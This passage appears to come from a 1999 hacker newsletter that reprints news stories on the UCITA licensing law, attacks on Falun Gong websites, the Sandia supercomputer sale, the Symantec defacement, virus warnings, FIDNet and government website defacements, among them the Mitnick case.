     week passed the Uniform Computer Information Transactions Act (UCITA) legislation, which is widely opposed by software consumer advocates, software
     developers, and IT organizations. 
   
     The legislation will theoretically allow software vendors to repossess software by disabling it remotely, and to disclaim warranties. It will also prevent the
     transfer of software licenses from one party to another without vendor permission, and will outlaw reverse engineering. 
   
     UCITA's opponents said that its development was heavily influenced by software manufacturers, and that it favors them in software contracts and disputes
     concerning software licensing. 
   
     "What purpose is it going to serve other than litigation and additional cost to users?" said Michael Scott, a senior engineer at the California Department of
     Transportation, in Sacramento, Calif. "It sounds like a great coup for the software industry, but doesn't sound very advantageous for users." 
   
     Members of the National Conference of Commissioners on Uniform State Laws (NCCUSL) voted on UCITA and several other revisions to the commercial
     code at their annual meeting in Denver. 
   
     In a state-by-state vote, 43 states approved UCITA, six opposed it, two abstained, and two were not present at the voting. The proposal now goes to various
     state legislatures for approval. Most or all states typically approve the laws recommended by the NCCUSL. IT opposition to the legislation, including a
     letter-writing campaign to members of the NCCUSL, failed to sway the commissioners. 
   
     The dry, complex language of the 123-page legislation may also have contributed to a lack of understanding on the part of many software users. 
   
     Proponents of the legislation have said that UCITA is a necessary step in defining the law regarding software and computer information sales, which were not
     contemplated when the Uniform Commercial Code (UCC) for the sale of goods was written. 
   
     The act means both vendors and users will be able to count on a uniform law, instead of relying on differing laws on a state-by-state basis, according to Ray
     Nimmer, a law professor at the University of Houston Law Center and the law's primary author. 
   
     "We think that this will extend the rights of end-users," Nimmer said. 
   
     Nimmer said that the opposition to the law during the last year and a half has been punctuated by hyperbole, and now it is critical that the debate shift over to
     reality. 
   
     Opponents to the legislation include technology consumer groups, various trade associations, and some law professors, who contend that UCITA will result in
     increased costs for companies, while giving software vendors undue power. 
   
     "This law is going to be bad for the industry and for the country," said Cem Kaner, a software developer, attorney, and author who has taken a lead in fighting
     the proposal. "It redefines intellectual property law in a way that transfers huge amounts of power from the public, including universities, libraries, and [software]
     customers, to software publishers." In the days before the final UCITA vote, several state attorneys wrote letters to the president of NCCUSL, urging the group
     to reject the law. An estimated 25 to 28 attorneys general have gone on the record in opposition, including those from Connecticut, Idaho, Indiana, Iowa, Kansas,
     Oklahoma, Pennsylvania, and Washington state. 
   
     The National Conference of Commissioners on Uniform State Laws, in Chicago, is at www.nccusl.org. 
   
     Jack McCarthy is a San Francisco correspondent for the IDG News Service, an InfoWorld affiliate. Nancy Weil is a Boston correspondent for the
     IDG News Service, an InfoWorld affiliate. Jessica Davis is an InfoWorld associate news editor. 
   
     @HWA    
     
07.0 Falun Gong Web Sites Attacked by China? 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/

      contributed by tacscan 
      Falun Gong, a meditation group, is claiming that
      the web sites of its supporters are being
      targeted and attacked by China. Initial evidence seems to
      point to the Public Security Ministry's Internet
      Monitoring Bureau as the agency responsible for various
      attacks. Falun Gong, outlawed in China, is a group that
      draws on martial arts, Buddhism and Taoism and is
      devoted to physical and mental fitness, high moral
      standards, and denies that it is either a religion or a
      political movement. 

      Boston Globe           
      http://www.boston.com/dailynews/211/nation/Chinese_officials_try_to_hack_:.shtml
      
      Chinese officials try to hack U.S. Web sites, meditation
      group members say 
     
      By Peter Svensson, Associated Press, 07/30/99 16:17 
     
      NEW YORK (AP) Web sites in the United States and elsewhere devoted to the Falun Gong
      meditation group are coming under heavy electronic attack, managers of the sites said Friday, and
      at least one ''hacking'' attempt appears to trace back to a Chinese national police bureau in Beijing. 
     
      Falun Gong has been banned in China, where communist authorities are engaged in an escalating
      crackdown, arresting adherents and confiscating publications and videos. 
     
      Bob McWee, of Middletown, Md., a Falun Gong practitioner, said a site he maintains to promote
      the group, www.falunusa.net, has been under persistent electronic assault. 
     
      In a telephone interview, McWee said his Web server was undergoing a continuous
      ''denial-of-service'' attack, a common Internet tactic used to overwhelm a computer with repeated
      electronic requests like a telephone ringing nonstop to block other callers. 
     
      In addition, someone tried to gain access to the server, pretending to be a legitimate webmaster,
      and in the process left an Internet address, he said. 
     
      ''They tried to hack my machine from theirs. And they can't do that without revealing their'' Internet
      address, he said. 
     
      The address McWee said was left behind is registered with the Asia Pacific Network Information
      Centre, a public registry service for Internet addresses. According to the service, there are two
      phone numbers in Beijing listed with that address. 
     
      When The Associated Press called the numbers, a person who answered the phone identified them
      as belonging to the Public Security Ministry. A telephone operator at the ministry said they
      belonged to its Internet Monitoring Bureau. 
     
      Ministry officials and spokesmen refused to comment Friday. 
     
      McWee registered a complaint about the hacking attempt with the Maryland state police's
      computer crimes division. 
     
      Police spokesman Pete Piringer said that because the attack did not succeed in getting access to
      McWee's server, there did not seem to be a crime committed. 
     
      A U.S. government agency saw an indirect sign of the attacks. 
     
      A network engineer at the U.S. Department of Transportation contacted McWee when they
      noticed his server was contacting one of their computers unasked, according to Everett Dowd,
      deputy director of telecommunications of the Information Technology Operation at the department. 
     
      McWee said this was because the denial-of-service attack sent requests to his server with forged
      return addresses, one of which happened to be the department's server. 
     
      Administrators of other Web sites devoted to the movement also said they had been attacked. 
     
      Li Shao, in Nottingham, Britain, said the site he maintains was hacked into Monday. What he called
      Chinese ''government propaganda'' was placed on some pages, while others were deleted. 
     
      Jillian Ye, of Toronto, Canada, who maintains two sites, said that beginning one or two months ago,
      her server began going down almost every day. The problems got progressively worse, until she
      recognized the symptoms of an attack and moved the sites to a more secure server. 
     
      In their barrage of criticism of Falun Gong, Chinese state media have cited the group's Internet
      presence as proof that it was well-organized and not just harmless meditation buffs. 
     
      A government ban on Falun Gong publications passed after the group was outlawed includes
      electronic publications. Nearly all of Falun Gong Web sites in China have been shut down since the
      ban was announced. 
     
      China's communist leaders banned the Falun Gong movement last week, accusing it of trying to
      develop political power. Falun Gong leaders have denied any political ambitions and denied they
      organized protests that erupted two weeks ago after authorities reportedly arrested leading
      members of the group. 
     
      Falun Gong, founded by Li Hongzhi, who now lives in the United States, draws on martial arts,
      Buddhism and Taoism. The group says its goals are physical and mental fitness and high moral
      standards, and denies that it is either a religion or a political movement. 
     
      Associated Press Writer John Leicester in Beijing contributed to this report. 
      
      @HWA
      
08.0 Super Computer Almost Gets Away 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

      contributed by Mudge 
      Sandia National Laboratories sold a surplus nuclear
      weapons research computer, an old Intel Paragon XPS,
      as "spare parts", without the OS to a Chinese national in
      California for $30,000 last October. Quing-Chang Jiang,
      a citizen of the People's Republic of China, then tried to
      buy the parts from Intel needed to make it run again.
      After conferring with the DOE, Sandia then paid $88,000
      two weeks ago to get it back because of security
      worries about the deal. The computer, the fastest in
      the world in 1993, while now obsolete by U.S.
      standards, could have aided a foreign government in
      duplicating the advanced work done by US nuclear
      weapons labs. (Super Computers just aren't that hard
      to get a hold of these days, even fully functional ones.)

      San Jose Mercury News - second story
      http://www7.mercurycenter.com/premium/nation/docs/natwashdig24.htm
      < link broken/Story missing - Ed >
      
      Posted at 8:57 p.m. PDT Friday, July 23, 1999 

      U.S. buys back computer sold
      to Chinese citizen

      Associated Press 

      WASHINGTON -- The Energy Department's Sandia National
      Laboratory last week bought back a supercomputer it had sold as
      surplus to Korber Jiang, a Chinese citizen who is the principal of EHI
      Group USA and exports American goods to his home country.

      Rep. Curt Weldon, R-Pa., called Friday for Energy Secretary Bill
      Richardson's resignation, saying that the computer could have been
      used ``to design nuclear weapons.''

      ``He's going around the country saying there are no problems in the
      Department of Energy, that everything is under control,'' Weldon said
      in a telephone interview. ``If there are no problems, then how can this
      happen?''

      Neal Singer, a spokesman for Sandia National Laboratories, said that
      the New Mexico facility sold the Intel Paragon XPS to Korber's
      one-man company for $30,000 in October. After discovering
      Korber's nationality, Singer said, the department bought back the
      computer for $88,000 last week and stored it under guard at Sandia.
      The spokesman said the difference in cost may have been due to
      shipping costs incurred by Korber.

      ``Secretary Richardson has instituted a moratorium on any sales of
      surplus material that incorporates export control technology until there
      has been a thorough review of what happened,'' said Energy
      Department spokeswoman Brooke Anderson.

      The transaction was first reported by Insight Magazine.
      
      @HWA

      
09.0 Symantec's website hacked
     ~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Contributed by D----Y
     
     It was rumoured that the site was not only hacked but also infected with virii;
     this article tries to clear up the story. ZDNET - ed
     
     
     
     http://www.zdnet.com/filters/printerfriendly/0,6061,2307804-2,00.html     
     
     --------------------------------------------------------------
     This story was printed from ZDNN,
     located at http://www.zdnet.com/zdnn.
     --------------------------------------------------------------
     
     Symantec: Vandals didn't infect us
     By Robert Lemos, ZDNN
     August 2, 1999 2:02 PM PT
     URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html
     
     Internet vandals broke into the servers of network security and utilities firm Symantec Corp.
     Monday morning, defacing the company's Web site. 
     
     While the vandals claimed to have infected Symantec's network two months ago with a worm,
     quaintly dubbed Bloworm, the company denied Monday that any worm existed on its systems. 
     
     "There is no virus infection, no worm infection, and no danger to customers," said Richard Saunders,
     a spokesman for the Cupertino, Calif., company. 
     
     "They didn't get in beyond posting a mildly offensive, but otherwise impotent, message on our home
     page." 
     
     The five cyber vandals, who identified themselves only by their handles, claimed otherwise. "0ur
     w0rm iz spreading around (Symantec's) netw0rk and infecting (it's) f1lez, since about 2 months ago.
     phear," stated the group in a document of typically spelling-impaired hacker-speak. The document
     was left behind by the group after it broke into the servers of Symantec at about 5 a.m. PT Monday.
     
     Worms are virus-like programs that infect systems through networks automatically and without the
     need for an unknowing user to open a file or run an application. 
     
     Symantec (Nasdaq:SYMC) has always been a popular target for Internet vandals looking for a hard
     nut to crack. The only difference: This time someone actually got in. 
     
     "What this incident does show is that you cannot be complacent towards this kind of threat," said
     Saunders. The Symantec spokesman could not detail how the cyber vandals entered the company's
     network. 
     
     Symantec engineers took down the page within an hour of its posting, but not before the media in
     Europe got wind of the defacement. The BBC posted a story early Monday morning.       
      
     -=-
     
     BBC;
     
     Anti-virus company hacked
     A leading provider of net security and anti-virus software, Symantec, 
     has had its website hacked for about 12 hours, ending around 1300 BST. 
     
     The FBI has been informed and is already beginning an investigation.
     
     Visitors to www.symantec.com early on Monday found a page claiming that a
     group of five crackers had infiltrated Symantec's servers with a virus called
     bloworm. 
     
     The crackers said that their virus, a worm, has been spreading around 
     Symantec's network, infecting files for two months. 
     
     However, Aled Miles, Symantec's Regional Director for UK and Ireland, told BBC News
     Online: "I can categorically state that there is no effect on our servers internally
     - that is a hoax which adds to the publicity wagon." 
     
     He added that: "We have established that there was no risk [of infection] to anyone
     visiting our website during that time." 
     
     
     Symantec are the makers of Norton Anti-virus software and their UK website says: 
     "Symantec is a leader in Internet and content security."   
     The hacking of their website will be seen as embarrassing but Mr Miles said that any
     organisation, even the CIA itself, could fall prey to malicious attacks like these. 
     
     He said: "The sad reality is that whilst the Internet is a tremendous new technological
     force, it comes with its down side. What matters is how quickly we as a company react to
     this type of incident. 
     
     "What I am not embarrassed about is the speed and agility we have shown in sorting this
     out. I don't think it damages our reputation in the slightest." 
     
     Symantec has become a higher profile target in recent months due to its work in combatting
     viruses such as Melissa, explore.zip and the program Back Orifice. 
     

     @HWA
     
10.0 New virus due to hit town "New virus spills your beans " - BBC
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Contributed by D----Y
     
     BBC
     
     http://news.bbc.co.uk/low/english/sci/tech/newsid_381000/381054.stm
     
     Tuesday, August 3, 1999 Published at 15:11 GMT 16:11 UK 

     

                                       
     New virus spills your beans
     A new strain of computer virus could distribute your highly confidential documents all over the Internet.
         
     Anti-virus developers are warning that they cannot develop an antidote until the virus appears. Far from
     destroying vital files, the virus will make sure everyone can see them. 
     
     The new virus is expected to be a variant of either Melissa or the Explore.Zip worm, both of which have 
     cost businesses millions in recent weeks. 
     
     Both Melissa and the Explore.Zip worm rely on people opening email attachments. Once into the computer 
     the virus sends a message to everyone in the victim's in-box and then destroys every file written in 
     Microsoft Word, Excel or Powerpoint, among others. 
     
     New virus on the block 
     
     One variant has already appeared. PrettyPark replicates itself by sending copies to everyone in the victim's
     address book. 
     
     It waits silently until the victim is on the Internet, then sends lists of the victim's user names, password
     files and address lists to Internet Relay Chat channels. Anti-virus developers are expecting the next step to
     be a virus which roots around in your files and then posts your documents across the Internet. 
     
     "The virus wouldn't be able to tell which of your documents are secret. It might just post your shopping list,
     or it could be a highly sensitive company document. 
     
     "What's more, it would appear as if you sent it," says Graham Cluley of Sophos Anti-Virus. 
     
     Several anti-virus makers already have an answer to PrettyPark. But they cannot build a defence against future
     variants until they encounter them. 
     
     Java and ActiveX - next infection target 
     
     It is predicted that the next generation of viral infections will hit small Webpage programmes called applets,
     written in Java and particularly ActiveX. 
     
     A recent survey revealed that more than half of medium-sized organisations using an intranet had no security 
     policy in place to respond to the threat of attacks on Java applets. 
     
     Recent estimates indicate that Melissa, Explore.Zip and other malicious attacks have cost US business $7.6bn 
     this year alone. 
     
     @HWA

11.0 New York Times Debunked - FIDNet Moves Ahead as Planned 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

      contributed by Ted 
      The Register has taken the time to actually read the
      draft proposal reported on last week by John Markoff of
      the New York Times. The draft proposal, now seven
      weeks old, calls for the creation of the Federal Intrusion
      Detection Network, or FIDNET. When the NYT reported
      on this story last week privacy advocates cried foul
      claiming that such a network would intrude on personal
      freedoms. Obviously a closer look at the document is
      warranted. 

      The Register 
      http://www.theregister.co.uk/990730-000022.html

      Officials from the CIAO and NIPC and other groups have
      said that the recent media attention and public outcry
      over the proposed FIDNet will not prevent the plan from
      going forward. 

      Federal Computer Week 
      http://www.fcw.com:80/pubs/fcw/1999/0802/fcw-newssecurityside-08-02-99.html
      
      
      
      The Register;
           
    
      Posted 30/07/99 7:31pm by Thomas Greene in Washington
    
      US net snooping plans debunked
    
      Terror spread across the Net on Thursday when New York Times correspondent John
      Markoff broke the Big Story: a National Security Council draft proposal will put the FBI in
      control of "a sophisticated software system to monitor activities on non-military
      Government networks, and a separate system to track networks used in crucial industries."
    
    
      Ghastly. The body to be created will be called the Federal Intrusion Detection Network, or
      FIDNET. Big Brother by another name, no doubt. Libertarian alarmists and conspiracy
      paranoiacs dropped their daily meds and rose angrily, if unsteadily, to arms. 
    
      "The plan... specifies that the data [FIDNET] collects will be gathered at the National
      Infrastructure Protection Center (NIPC), an interagency task force housed at the Federal
      Bureau of Investigation," the Times went on, adding that "the plan strikes at the heart of a
      growing controversy over how to protect the nation's computer systems while also
      protecting civil liberties -- particularly since it would put a new and powerful tool into the
      hands of the FBI." 
    
      But it so happens that The Register has its own copy of the draft proposal, and unlike the
      New York Times, we've actually read ours. Let's just have a peek at the text. 
    
      The first observation we make is that the text states plainly, "the GSA (General Services
      Administration) is responsible for establishing the FIDNET Program Office: this includes
      creating an interagency management team from the defence, intelligence, technical, legal,
      and law-enforcement communities." 
    
      According to our reading, FBI's NIPC team will come in later, when FIDNET data gathered
      by the GSA suggest criminal activity. Again we take the unconventional approach of
      consulting the text: "FIDNET will provide raw/filtered data from network sensors and the
      Federal Computer Incident Response Capability. NIPC will continue to be responsible for
      further data processing." 
    
      We remain at a loss to explain why the NYT reported that FIDNET would "put a new and
      powerful tool into the hands of the FBI." On the contrary, it appears that the Bureau's NIPC
      will be a tool of the GSA, if and when it decides the government has been cracked. 
    
      Michael Vatis, FBI's Director of NIPC, made it clear during testimony to the Senate Y2K
      Committee yesterday that the FBI will respond only where there is evidence of a federal
      crime. 
    
      The only language we found in any way alarming was, "FIDNET will interface with the
      currently planned intrusion detection systems being developed for DOD (Department of
      Defence) and national security agencies." We didn't quite know what the pseudo-verb
      "interface" was intended to mean, but we know that American law enforcement and the
      military are forbidden to do a great deal in the way of "interfacing". As the very existence of
      America's Act of Posse Comitatus indicates a history of some difficulty in distinguishing
      between civil and military purviews, this little snippet naturally raised our eyebrows. 
    
      On this matter the Department of Justice computer crimes division declined to be helpful.
      The level of interdependence between military and non-military bodies being contemplated
      is indeed a controversial issue, but it seems unlikely that the final product will initiate military
      involvement in civilian affairs enough to invite a popular backlash. Elections are coming up,
      after all; and the FIDNET system will present itself as a tempting target for cyberterrorists if
      its management becomes odious, thereby having the ironic effect of decreasing security for
      government systems. 
    
      Assuming that the language of the proposal does get tidied up a bit, we can expect a much
      softer line in reference to DOD's role in FIDNET. This still leaves the matter of DOD
      participation in case of an emergency. The president is permitted by law to suspend the Act
      of Posse Comitatus in difficult circumstances, such as insurrection, mayhem in the
      streets, foreign invasion, or those the Y2K rollover might possibly present. A further bit of
      constitutional intrigue will undoubtedly emerge if a foreign military organization should attack
      a US civilian network related to banking, energy, transportation or some other essential
      service. It does not necessarily follow that the DOD would need access to civilian networks
      in order to reply on behalf of the USA. 
    
      Vatis for one thinks an organised attack is inevitable. He declined to go into specifics, but
      left us with the strong impression that hostile military bodies overseas are developing the
      means to disable military, government and civilian networks remotely via an internet-based
      attack. Clinton's National Security Advisor, Sandy Berger, said on Thursday that there exist
      "governments that we know are developing systems to get access to our computer
      systems." Not an especially comforting thought. "We know that, in fact... there have been
      intrusions into sensitive systems," Berger added. Whether or not such an attack is being
      planned, it is certain that the US government expects one. 
      We wonder if the increased level of connection among government systems needed for
      FIDNET to monitor them effectively might not lead to increased vulnerability. Whether it
      happens, or when it happens, it is sure to be a jurisdictional nightmare; and the FIDNET
      proposal does foreshadow that confusion with its own vague language. 
    
      A crucial point here is that the proposal leaked to us is in draft form and now seven weeks
      old. The Register's contact on the White House National Security Council, who goes by the
      name of "an administration official," made it clear that the final draft will not be ready for
      submission to the President until September at the earliest. The FIDNET document is at
      present quite fluid, and on its way past numerous reviewers including the Department of
      Justice computer crimes division, the General Services Administration, the Department of
      Defence, the National Security Council and the FBI. 
    
      Furthermore, our source at NSC tells us, the proposal currently being circulated does
      address and tighten up the unfortunately vague "interface" language. The level of
      involvement between DOD and non-military government agencies is intended to be little
      more than an advisory relationship and a sharing of new quirks, bugs and attack techniques
      much as "one police department might share tips with another in a different jurisdiction." 
    
      The language which led to an assumption by many that FIDNET might one day monitor
      private-sector networks is also being clarified. NSC says that there will not be even an
      opt-in programme for private users to voluntarily choose such monitoring. FIDNET will,
      however, share its tricks with private enterprise, and leave it to them to implement what it
      chooses, on its own nickel. 
    
      The Register will report fully and eagerly on the specific changes to the FIDNET proposal
      as soon as the latest version is leaked. It might actually make sense to withhold judgment
      on the piece until after it's been reviewed and polished. Just a thought.

      -=-
      
      Federal Computer Week;
      
      
      AUGUST 2, 1999 


      Officials: Security plan on track

      In the face of privacy concerns, schedule remains unchanged

      BY DIANE FRANK (diane_frank@fcw.com)

      Despite public outcry and congressional interest, federal officials are sticking
      to their schedule for developing and releasing a plan to protect the federal
      information infrastructure from cyberattacks. 

      Several stories in the media last week inaccurately reported that the draft of the
      National Plan for Information Systems Protection would put the FBI in charge
      of monitoring private-sector and government networks for cyberattacks through
      the Federal Intrusion Detection Network (Fidnet). 

      This touched off protests from public-interest groups about citizens' privacy, and
      several members of Congress asked for a complete copy of the draft and a
      briefing in the next few weeks. 

      Officials from the Critical Infrastructure Assurance Office (CIAO), the
      National Infrastructure Protection Center and other high-level federal groups
      involved in creating the plan said the attention to what is still an internal
      document under development will not change anything. 

      "This will have no effect on the process," one senior National Security Council
      official said. "It is just now completing the second round of comments from the
      agencies and industry...and will be brought to the president in October." 

      Others stressed that the plan deals only with federal networks and that the
      privacy and civil rights of Americans are being taken into account at every step.

      "An important element of the Fidnet program is a legal review by the Justice
      Department," said John Tritak, director of the CIAO. The plan also is being
      reviewed by the chief counselor for privacy at the Office of Management and
      Budget's Office of Information and Regulatory Affairs, and those reviews may
      change the current version of the plan, he said. 

      In fact, the first version of the plan has already been reviewed by the Office of
      the Assistant Attorney General, which determined it was completely legal,
      according to a senior DOJ official.

      The plan is based on the critical infrastructure protection plans from agencies
      and industry required by Presidential Decision Directive 63 and originally was
      scheduled to be sent to Congress and the president this fall, Tritak said.

      It also includes programs for education and training of information security
      professionals, research and development of computer security profits, and the
      basis for revisions of current laws to "promote greater information sharing,
      enhance systems security, and strengthen protections for civil liberties and
      privacy."

      Although members of Congress have known about the plan for some time, most
      did not realize its extent, and that is partly what touched off a request from Sen.
      Bob Bennett (R-Utah) to receive a copy of the plan, said a spokesman for the
      senator. 


      @HWA
      
12.0 Computer `crackers' set sights on .gov for chaos
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

     Contributed by D----Y
     
     http://www.businesstoday.com/techpages/hack08011999.htm
     
     Computer `crackers' set sights on .gov for chaos
     by Mark Mueller 

     Sunday, August 1, 1999

     It was the kind of threat for which computer hackers are famous, a
     declaration of war dripping with the risk-free bravado so common on
     the anonymous Internet.

     The warning, which appeared on a hacked Web page of the U.S.
     Interior Department in late May, promised unrelenting attacks against
     government computers to avenge an FBI roundup of hackers
     associated with the group Global Hell. Just weeks earlier, Global Hell
     had claimed responsibility for an attack on the White House's main
     Web page.

     ``Now, it's our turn to hit them where it hurts by going after every
     computer on the Net with a .gov,'' the message read. ``We'll keep
     hitting them until they get down on their knees and beg.''

     That the threat was made - risking the pique of the FBI - isn't as
     surprising as the follow-through. In recent months, hackers, or
     crackers, as bad-guy hackers are known, have indeed blazed through
     a wide swath of government and university computers, defacing some
     Web sites and shutting down others.

     Among the high-profile targets: the U.S. Senate (twice), the Army,
     the Navy and the Departments of Agriculture, Labor and the Interior.
     Computer systems also were hit at Georgetown University, the
     University of Colorado, the University of Michigan and Harvard
     University.

     The most brazen of the attacks targeted the lion's den itself: the FBI
     Web page, which was out of service for nearly a week as
     programmers beefed up security on the site.

     Jim Settle, former chief of the FBI's computer crimes squad and now
     an Internet security consultant, calls the FBI strike ``an out-and-out
     declaration of electronic warfare.''

     For some, it's a war that can't afford to be lost. The feeble network
     that once was the domain of a few scientists is now a robust and
     far-reaching behemoth that caters to hundreds of millions of people,
     some of whom pay their taxes, buy goods and send intensely personal
     information through their computers.

     In the wrong hands, such information could prove embarrassing or
     costly. Seen in its most sinister light, computer intrusion is a threat to
     national security.

     But the self-proclaimed ``warriors'' who carried out the recent
     attacks against government Web sites hardly sound like cyberspace
     shock troops.

     Their loose-knit groups bear names like the ``Keebler Elves,'' the
     ``Masters of Downloading'' and ``Hacking for Girlies.''

     When they hack sites, they traditionally leave behind inane scrawlings
     - ``Boo! Did we scare you?'' - and ``shout-outs'' to their friends.

     Those familiar with the hacking subculture say such groups are
     generally composed of teens - and occasionally people in their early
     20s - with a lot of computer equipment and too much time on their
     hands.

     ``These are just immature kids doing this from their home
     computers,'' said John Vranesevich, founder of Anti-Online, a group
     that tracks hacker activity and that has compiled dossiers on 6,000
     hackers. ``It's a game to them. They make a move, and they can't
     contemplate how it affects people in the real world. It's not reality
     until the FBI bangs on their door.''

     Vranesevich called the recent wave of attacks a ``temper tantrum''
     over the May FBI raids, in which agents confiscated computer
     equipment and questioned teens in 11 cities, including Houston,
     Seattle and San Diego. A spokeswoman for the FBI in Boston said the
     New England office was not involved in the operation.

     Those who deface Web sites - about 1,300 sites have been defaced
     so far this year, according to the most reliable statistics - justify their
     actions by arguing they're actually doing companies and organizations
     a service by pointing out security deficiencies.

     But law enforcement authorities and others who deal with hackers
     dismiss the argument.

     ``I don't buy it,'' said Drew Williams, the founder of an AXENT
     Technologies' SWAT team to deal with hacker attacks. ``Any hacker
     group that has not been invited to test security is committing a
     crime.''

     That assessment is shared by David Green, deputy chief of the
     computer crimes and intellectual property section at the Justice
     Department.

     ``This is not just electronic graffiti,'' Green said. ``They're shutting
     down access to Web sites, sometimes for hours, sometimes for days,
     and it makes it impossible for people who want access to that Web
     source to get it.''

     Moreover, there's far more at risk than down time for Web servers,
     contends Peter Mell, who conducts hacker research for the National
     Institute of Standards and Technology, a division of the U.S.
     Commerce Department.

     ``Real harm can be done,'' Mell said. ``A lot of people download their
     tax forms from the IRS today. What if someone broke into the IRS
     Web server and changed just a single number? It would cause
     supreme chaos.''

     Mell also pointed to electronic banking and stock trading, saying Web
     servers today handle increasing amounts of sensitive information.

     ``This isn't child's play anymore,'' he said. ``I pay my bills online. I
     trade stocks online. In that kind of environment, I can't afford people
     breaking into computers.''

     The FBI heartily agrees, though it has not characterized its
     crackdown on hackers in quite the grandiose terms that hackers do.

     ``We don't have a war against hackers. We're following our mandate,
     which is to investigate violations of federal law,'' said Bill Carter, a
     spokesman for the FBI's headquarters in Washington. ``The fact that
     these hackers or hacker groups have their noses out of joint over
     this, we can't help that.''

     Most hackers are not caught, but the recent raids suggest the FBI is
     starting to get better at tracking them. The agency has about 500
     open computer crimes cases at any given time.

     But the federal agents' methods - charging in with warrants and
     bulletproof vests - worry some in the hacking community.

     ``For those of us in the scene for a number of years, it's starting to
     get scary only because we worry it's going to turn into a witch hunt,''
     said Space Rogue, a member of the Boston-area group L0pht Heavy
     Industries, a former hacker clan that now bills itself as an electronic
     think tank.

     ``While defacements will probably continue no matter what law
     enforcement officials do, it would be very easy for the government to
     just start executing search warrants left and right, seizing computers
     and scaring people half to death.''

     Internet watchdogs - and some hackers themselves - say that while
     the crackdown should continue, the real issue is computer security.

     Space Rogue argues that nearly all Web page defacements are
     carried out with known security flaws in software. As an example, he
     said, his group e-mailed the Army's webmaster about a flaw in its
     ColdFusion server software a month before someone used the hole to
     hack into the Army's Web site.

     ``It comes down to the person in charge of the machine and whether
     they're taking their security seriously,'' Space Rogue said. ``This sort
     of thing never should have happened in the first place.''

     Settle, the former FBI computer crimes chief, says the danger will be
     far greater when those doing the hacking aren't teens out for kicks
     but terrorists intent on electronic warfare.

     ``Our computer systems today are like cars operating without safety
     equipment: no headlights, no bumpers, no airbags, no roofs,'' he said.
     ``Heck, if teenagers can do this, what can sophisticated intelligence
     operatives do? This is just a taste of things to come.''

     The government acknowledges as much.

     In testimony before a congressional panel, government security
     experts said government computers are easy marks because
     employees lack training, because well-trained staff flee for the bigger
     paycheck of the private sector and because internal security
     procedures often aren't followed.

     ``Most federal agencies continue to lack the ability to detect against
     and recover from cyber attacks,'' U.S. Rep. Connie Morella (R-Md.),
     chair of the House Science Subcommittee on Technology, said at the
     June 23 hearing.

     To combat the deficiency, the Clinton administration last week
     proposed spending $1.5 billion in the next fiscal year on a
     sophisticated intruder warning system that would be installed on
     military, government and private-sector computer networks by 2003.

     Operating something like a burglar alarm, the system would detect
     break-ins, funneling that information to a central location.

     ``A concerted attack on the computers of any one of our key
     economic sectors or governmental agencies could have catastrophic
     effects,'' Clinton wrote in a draft cover letter accompanying the
     proposal.

     Civil libertarians and Internet privacy watchdogs already have
     protested the plan, saying it will give the government unprecedented
     surveillance powers, equipping authorities with the tools to peruse the
     private dispatches of the masses.

     House Majority Leader Dick Armey (R-Texas) joined in the criticism,
     deriding the plan as an opportunity for ``government peeping toms.''

     No matter the government response, hackers will, no doubt, continue
     mounting challenges, probing for deficiencies in networks and deriding
     those who chase them.

     ``You can stop one, but you can not stop all,'' hackers wrote when
     they defaced the U.S. Senate Web page for the second time in late
     June.

     A more recent defacement of an obscure Venezuelan Web page
     repeated the theme, carrying a ``call to arms'' imploring competing
     hacker groups to unite to ``win this war.''

     ``Remember, this is our world, not the government's,'' the page read.

     Time will tell.

     Prosecuted `cracker' a martyr to techies

     In hacker circles, he is a modern-day martyr, a technological tinkerer
     whose attacks on other people's computers amounted to harmless
     exploration before the FBI swooped down on him, dubbing him Online
     Enemy No. 1.

     To prosecutors and to judges, he is a dangerous miscreant whose
     ability to crack computer systems and whose propensity for running
     from the law required that he be held without bail.

     Kevin Mitnick, for four years the cause celebre of the Internet's dark
     side, could soon be going free.

     Mitnick, 35, who pleaded guilty in March to multiple counts of
     computer and wire fraud for breaking into systems and stealing
     software from such companies as Sun Microsystems, Novell, Motorola
     and Nokia, will be sentenced Aug. 9 under a plea agreement that
     could, with good behavior credits, allow him to leave federal prison
     within weeks.

     ``Kevin is optimistic that this case will be over and that he can get
     on with his life,'' said Mitnick's lawyer, Donald C. Randolph of Santa
     Monica, Calif.

     But even if Mitnick himself fades into obscurity, his cause is unlikely
     to follow. In the hacking community, Mitnick long ago became a
     symbol of what hackers term gross government over-reaction, a
     theme repeatedly hammered home by Randolph.

     ``The government prosecution of Mr. Mitnick was to carry out an
     agenda launched by them in the 1990s,'' Randolph said.

     ``The government wanted to demonstrate they were going to be
     tough on computer terrorism. Unfortunately, the government did not
     have a bonafide computer terrorist to prosecute, so they went after
     Mr. Mitnick, a recreational hacker who was arrested with a big splash
     and who became a convenient target.''

     Randolph's comments could be dismissed as the arguments of a
     defense lawyer looking to gain sympathy for his client, but he's not
     the only one making them.

     Drew Williams, who founded Axent Technologies' SWAT team to
     respond to hacking incidents for clients, said the government
     miscalculated with Mitnick.

     ``I am not a Mitnick supporter at all. However, I think the
     government did in fact set out to make an example and instead made
     a martyr,'' Williams said. ``An individual's rights to due process
     probably got a little trampled.''

     Denied bail on charges that could have initially landed him in jail for a
     century, Mitnick appealed all the way to the U.S. Supreme Court,
     where the justices declined to hear his lawyer's argument that bail
     should be set.

     Hackers have seized on the bail issue, leaving ``Free Kevin''
     messages on the Web sites they hack. Recent examples include the
     home pages of the U.S. Senate and Greenpeace, where hackers left
     the tongue-in-cheek message ``Free Mitnick or we will club 600 baby
     seals.''

     There is also a ``Free Kevin'' Web site (www.freekevin.com) that
     gives Mitnick updates and carries a confinement clock showing - to
     the second - how long Mitnick has been jailed.

     Randolph argues that while people should be prosecuted for breaking
     into systems, the law needs to be refined to distinguish between
     recreational hackers and information terrorists.

     ``I do not quarrel at all with the government's right to prosecute
     computer fraud and to go after computer terrorists, but it's high time
     they distinguish between high crimes and misdemeanors so they're
